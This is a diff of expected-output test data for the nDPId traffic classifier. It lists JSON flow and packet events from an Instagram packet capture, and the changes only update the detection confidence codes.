00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQ
tcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"} 
@@ -76,53 +75,53 @@ 00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1436720908523,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908523,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICMgTADUANxLxN7ABAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAE="} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1436720908524,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908524,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICINDADUANycOb2MBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1436720908533,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908533,"pkt":"ABsv8H60QPMIw47hCABFAABL7oJAAEARewDAqABnCAgICGesADUANyZVhbMBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"} 00792{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1436720908570,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"thread_ts_msec":1436720908570,"pkt":"QPMIw47hABsv8H60CABFAAEjliwAADgRGn8ICAgIwKgAZwA1yBMBD5NUN7CBgAABAAoAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAZACoQaWdjZG4tcGhvdG9zLWgtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAADHJABYFYTE0MDgGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGrsBxAAEAAQAAABMABC4hRqHAcQABAAEAAAATAAQuIUawwHEAAQABAAAAEwAELiFGpsBxAAEAAQAAABMABC4hRo\/AcQABAAEAAAATAAQuIUagwHEAAQABAAAAEwAELiFGqcBxAAEAAQAAABMABC4hRrc="} 
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1436720908575,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908575,"pkt":"QPMIw47hABsv8H60CABFAADD9CwAADgRvN4ICAgIwKgAZwA1g0MAr7pub2OBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAhACoQaWdjZG4tcGhvdG9zLWEtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFRcABYFYTEwMDEGZHNwdzQwBmFrYW1hacAmwHEAAQABAAAAEwAEUlUamsBxAAEAAQAAABMABFJVGpk="} 
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 